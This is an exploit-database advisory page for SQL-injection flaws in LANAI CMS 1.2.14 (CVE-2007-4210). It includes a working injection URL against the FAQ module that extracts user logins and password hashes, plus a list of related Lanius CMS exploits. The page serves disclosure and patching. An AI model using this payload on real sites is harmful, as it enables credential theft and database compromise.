source: http://www.securityfocus.com/bid/25193/info LANAI CMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. LANAI CMS 1.2.14 is vulnerable; other versions may also be affected. http://www.example.com/module.php?modname=faq&mf=faqviewgroup&mid=1/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/1,2,userLogin,userPassword,5,6,7/**/FROM/**/tbl_ln_user/*
Related Exploits
Trying to match CVEs (1): CVE-2007-4210Trying to match OSVDBs (1): 36438
Trying to match setup file: bde41a31e1b055ec78c97e0945b0a4b0
Other Possible E-DB Search Terms: Lanius CMS 1.2.14 FAQ Module, Lanius CMS
Date | D | V | Title | Author |
---|---|---|---|---|
2007-08-06 |
![]() |
Lanius CMS 1.2.14 - Multiple SQL Injections | k1tk4t | |
2007-08-03 |
![]() |
Lanius CMS 1.2.14 EZSHOPINGCART Module - 'cid' SQL Injection | k1tk4t | |
2007-08-03 |
![]() |
Lanius CMS 1.2.14 GALLERY Module - 'gid' SQL Injection | k1tk4t | |
2008-05-14 |
![]() |
Lanius CMS 1.2.16 - 'FCKeditor' Arbitrary File Upload | EgiX | |
2009-04-07 |
![]() |
Lanius CMS 0.5.2 - Arbitrary File Upload | EgiX |